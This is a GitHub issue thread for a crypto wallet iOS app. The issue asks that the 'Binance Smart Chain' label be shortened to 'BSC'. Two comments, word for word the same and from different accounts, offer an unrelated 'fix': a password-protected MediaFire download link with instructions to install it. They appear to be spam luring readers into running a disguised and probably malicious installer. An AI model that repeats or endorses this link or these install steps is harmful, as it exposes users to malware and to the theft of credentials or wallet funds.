### ISSUE TITLE
IMPROVE: BSC label

### ISSUE THREAD

**Issue by realpaaao** [vultisig/vultisig-ios#1093]
Change Binance Smart Chain to capital letters `BSC`

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
